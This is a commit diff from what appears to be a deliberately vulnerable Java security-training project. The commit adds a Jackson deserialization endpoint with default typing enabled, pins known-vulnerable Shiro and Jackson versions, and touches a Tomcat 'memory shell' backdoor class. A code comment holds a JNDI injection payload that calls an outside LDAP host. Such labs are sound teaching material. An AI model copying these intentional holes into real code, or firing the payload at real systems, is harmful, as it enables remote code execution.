Skip to content

Commit 920bd93

Browse files
author
JoyChou
committed
1 parent 4ede83a commit 920bd93

20 files changed

+203
-91
lines changed

README.md

Lines changed: 1 addition & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -47,6 +47,7 @@ Sort by letter.
4747
- ScriptEngine
4848
- Yaml Deserialize
4949
- Groovy
50+
- [Shiro](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/Shiro.java)
5051
- [Swagger](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/config/SwaggerConfig.java)
5152
- [SpEL](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/SpEL.java)
5253
- [SQL Injection](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/SQLI.java)

README_zh.md

Lines changed: 1 addition & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -42,6 +42,7 @@ joychou/joychou123
4242
- ScriptEngine
4343
- Yaml Deserialize
4444
- Groovy
45+
- [Shiro](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/Shiro.java)
4546
- [SpEL](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/SpEL.java)
4647
- [SQL Injection](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/SQLI.java)
4748
- [SSRF](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/SSRF.java)

java-sec-code.iml

Lines changed: 6 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -1,5 +1,11 @@
11
<?xml version="1.0" encoding="UTF-8"?>
22
<module version="4">
3+
<component name="AdditionalModuleElements">
4+
<content url="file://$MODULE_DIR$" dumb="true">
5+
<sourceFolder url="file://$MODULE_DIR$/spring-cloud-gateway-helloworld" isTestSource="false" />
6+
<sourceFolder url="file://$MODULE_DIR$/src/main/test" isTestSource="true" />
7+
</content>
8+
</component>
39
<component name="FacetManager">
410
<facet type="Spring" name="Spring">
511
<configuration />

pom.xml

Lines changed: 62 additions & 3 deletions
Original file line numberDiff line numberDiff line change
@@ -12,7 +12,6 @@
1212
<properties>
1313
<maven.compiler.source>1.8</maven.compiler.source> <!-- mvn clean package-->
1414
<maven.compiler.target>1.8</maven.compiler.target>
15-
<tomcat.version>8.5.85</tomcat.version>
1615
</properties>
1716

1817

@@ -197,11 +196,12 @@
197196
<version>1.7</version>
198197
</dependency>
199198

200-
<!-- rce -->
199+
201200
<dependency>
202201
<groupId>com.thoughtworks.xstream</groupId>
203202
<artifactId>xstream</artifactId>
204-
<version>1.4.10</version>
203+
<!-- For testing, you can use the vulnerable version of 1.4.10. -->
204+
<version>1.4.20</version> <!-- use latest version to exploit vuln by using xstream.addPermission-->
205205
</dependency>
206206

207207
<dependency>
@@ -344,6 +344,65 @@
344344
<version>11.5.8.0</version>
345345
</dependency>
346346

347+
<dependency>
348+
<groupId>org.apache.shiro</groupId>
349+
<artifactId>shiro-core</artifactId>
350+
<version>1.2.4</version>
351+
</dependency>
352+
353+
<dependency>
354+
<groupId>com.fasterxml.jackson.core</groupId>
355+
<artifactId>jackson-databind</artifactId>
356+
<version>2.9.8</version>
357+
</dependency>
358+
359+
<dependency>
360+
<groupId>com.fasterxml.jackson.core</groupId>
361+
<artifactId>jackson-annotations</artifactId>
362+
<version>2.9.8</version>
363+
</dependency>
364+
365+
<dependency>
366+
<groupId>com.fasterxml.jackson.core</groupId>
367+
<artifactId>jackson-core</artifactId>
368+
<version>2.9.8</version>
369+
</dependency>
370+
371+
372+
<!-- https://mvnrepository.com/artifact/org.jsecurity/jsecurity -->
373+
<dependency>
374+
<groupId>org.jsecurity</groupId>
375+
<artifactId>jsecurity</artifactId>
376+
<version>0.9.0</version>
377+
</dependency>
378+
379+
380+
<!-- 为了使用SimpleEvaluationContext,该类需要spring-expression版本大于等于4.3.15 -->
381+
<dependency>
382+
<groupId>org.springframework</groupId>
383+
<artifactId>spring-expression</artifactId>
384+
<version>4.3.16.RELEASE</version>
385+
</dependency>
386+
387+
<!-- https://mvnrepository.com/artifact/com.h2database/h2 -->
388+
<dependency>
389+
<groupId>com.h2database</groupId>
390+
<artifactId>h2</artifactId>
391+
<version>1.4.199</version>
392+
<scope>test</scope>
393+
</dependency>
394+
395+
<dependency>
396+
<groupId>org.apache.tomcat</groupId>
397+
<artifactId>tomcat-dbcp</artifactId>
398+
<version>9.0.8</version>
399+
</dependency>
400+
401+
<dependency>
402+
<groupId>com.alibaba</groupId>
403+
<artifactId>QLExpress</artifactId>
404+
<version>3.3.1</version>
405+
</dependency>
347406
</dependencies>
348407

349408
<dependencyManagement>

src/main/java/org/joychou/Application.java

Lines changed: 0 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -5,7 +5,6 @@
55
import org.springframework.boot.builder.SpringApplicationBuilder;
66
import org.springframework.boot.web.servlet.ServletComponentScan;
77
import org.springframework.boot.web.support.SpringBootServletInitializer;
8-
import org.springframework.cloud.netflix.eureka.EnableEurekaClient;
98

109

1110
@ServletComponentScan // do filter

src/main/java/org/joychou/config/TomcatFilterMemShell.java

Lines changed: 2 additions & 17 deletions
Original file line numberDiff line numberDiff line change
@@ -1,10 +1,5 @@
11
package org.joychou.config;
22

3-
import com.sun.org.apache.xalan.internal.xsltc.DOM;
4-
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
5-
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
6-
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
7-
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
83
import java.lang.reflect.Field;
94
import org.apache.catalina.core.StandardContext;
105
import java.io.IOException;
@@ -19,8 +14,8 @@
1914
import javax.servlet.*;
2015
import java.util.*;
2116

22-
@Component
23-
public class TomcatFilterMemShell extends AbstractTranslet implements Filter {
17+
//@Component
18+
public class TomcatFilterMemShell implements Filter {
2419
static{
2520
try {
2621
System.out.println("Tomcat filter backdoor class is loading...");
@@ -75,16 +70,6 @@ public class TomcatFilterMemShell extends AbstractTranslet implements Filter {
7570
}
7671

7772

78-
@Override
79-
public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {
80-
81-
}
82-
83-
@Override
84-
public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {
85-
86-
}
87-
8873
@Override
8974
public void init(FilterConfig filterConfig) throws ServletException {
9075

src/main/java/org/joychou/controller/Deserialize.java

Lines changed: 14 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -1,5 +1,6 @@
11
package org.joychou.controller;
22

3+
import com.fasterxml.jackson.databind.ObjectMapper;
34
import org.joychou.config.Constants;
45
import org.joychou.security.AntObjectInputStream;
56
import org.slf4j.Logger;
@@ -83,4 +84,17 @@ public String rememberMeBlackClassCheck(HttpServletRequest request)
8384
return "I'm very OK.";
8485
}
8586

87+
// String payload = "[\"org.jsecurity.realm.jndi.JndiRealmFactory\", {\"jndiNames\":\"ldap://30.196.97.50:1389/yto8pc\"}]";
88+
@RequestMapping("/jackson")
89+
public void Jackson(String payload) {
90+
ObjectMapper mapper = new ObjectMapper();
91+
mapper.enableDefaultTyping();
92+
try {
93+
Object obj = mapper.readValue(payload, Object.class);
94+
mapper.writeValueAsString(obj);
95+
} catch (IOException e) {
96+
e.printStackTrace();
97+
}
98+
}
99+
86100
}

src/main/java/org/joychou/controller/FileUpload.java

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -195,4 +195,4 @@ private static boolean isImage(File file) throws IOException {
195195
BufferedImage bi = ImageIO.read(file);
196196
return bi != null;
197197
}
198-
}
198+
}

src/main/java/org/joychou/controller/Jsonp.java

Lines changed: 1 addition & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -6,8 +6,8 @@
66
import com.alibaba.fastjson.JSONPObject;
77
import lombok.extern.slf4j.Slf4j;
88
import org.apache.commons.lang.StringUtils;
9-
import org.joychou.security.SecurityUtil;
109
import org.joychou.util.LoginUtils;
10+
import org.joychou.security.SecurityUtil;
1111
import org.springframework.beans.factory.annotation.Autowired;
1212
import org.springframework.http.MediaType;
1313
import org.springframework.security.web.csrf.CookieCsrfTokenRepository;
@@ -19,7 +19,6 @@
1919
import org.joychou.util.WebUtils;
2020

2121
import javax.servlet.http.HttpServletRequest;
22-
import javax.servlet.http.HttpServletResponse;
2322
import java.security.Principal;
2423

2524

src/main/java/org/joychou/controller/Jwt.java

Lines changed: 3 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -33,7 +33,9 @@ public String createToken(HttpServletResponse response, HttpServletRequest reque
3333
String loginUser = request.getUserPrincipal().getName();
3434
log.info("Current login user is " + loginUser);
3535

36-
CookieUtils.deleteCookie(response, COOKIE_NAME);
36+
if (!CookieUtils.deleteCookie(response, COOKIE_NAME)){
37+
return String.format("%s cookie delete failed", COOKIE_NAME);
38+
}
3739
String token = JwtUtils.generateTokenByJavaJwt(loginUser);
3840
Cookie cookie = new Cookie(COOKIE_NAME, token);
3941

0 commit comments

Comments
 (0)